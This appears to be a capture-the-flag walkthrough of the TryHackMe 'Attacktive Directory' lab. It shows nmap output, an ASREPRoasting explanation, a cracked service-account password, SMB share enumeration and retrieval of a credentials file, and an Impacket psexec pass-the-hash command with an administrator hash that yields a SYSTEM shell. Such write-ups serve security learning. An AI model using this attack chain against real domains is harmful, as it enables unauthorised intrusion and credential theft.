└──╼ [??]$ sudo nmap -sC -sV -oN nmap.out 10.10.75.70
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-09 09:16 +0630
Nmap scan report for 10.10.75.70
Host is up (0.82s latency).
Not shown: 987 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-11-09 02:49:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2021-11-08T02:48:07
|_Not valid after: 2022-05-10T02:48:07
|_ssl-date: 2021-11-09T02:50:08+00:00; +1m40s from scanner time.
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1m39s, deviation: 0s, median: 1m38s
| smb2-time:
| date: 2021-11-09T02:49:56
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.82 second
As nmap output add spookysec.local to /etc/hosts
echo $ip spookysec.local | sudo tee -a /etc/hosts
We can use enum4linux to enumerate SMB for Users, Shares, etc..., but this is along output and I didn't add in this section cause of there is not much interesting information.
After the enumeration of user accounts is finished, we can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting. ASReproasting occurs when a user account has the privilege "Does not require Pre-Authentication" set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.
Impacket provides a tool called GetNPUsers.py which searches the domain, lets attack the admin, svc-admin ,
Now we have credentials for smb server , svc-admin:management2005 ,
┌─[sheinn101@parrot]─[~/thm/attacktive-directory]
└──╼ [??]$ smbmap -H spookysec.local -d spookysec.local -u svc-admin -p management2005
[+] Finding open SMB ports....
[+] User SMB session established on spookysec.local...
[+] IP: spookysec.local:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
.
dr--r--r-- 0 Sat Apr 4 19:08:39 2020 .
dr--r--r-- 0 Sat Apr 4 19:08:39 2020 ..
fr--r--r-- 48 Sat Apr 4 19:08:53 2020 backup_credentials.txt
backup READ ONLY
C$ NO ACCESS Default share
There is one interesting file which is called backup_credentials.txt in backup folder, Let's login and download it.
┌─[sheinn101@parrot]─[~/thm/attacktive-directory]
└──╼ [??]$ smbclient \\\\10.10.75.70\\backup -U svc-admin
Enter WORKGROUP\svc-admin's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Apr 5 01:38:39 2020
.. D 0 Sun Apr 5 01:38:39 2020
backup_credentials.txt A 48 Sun Apr 5 01:38:53 2020
8247551 blocks of size 4096. 3571598 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \>
python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:@spookysec.local -hashes aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on spookysec.local.....
[*] Found writable share ADMIN$
[*] Uploading file hFPZJEou.exe
[*] Opening SVCManager on spookysec.local.....
[*] Creating service ekJz on spookysec.local.....
[*] Starting service ekJz.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1490]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Now we get Administrator access.
We can bruteforce the domain controller with usernames and password list that are already given for this room and download it. To enumerate this, we can use this .
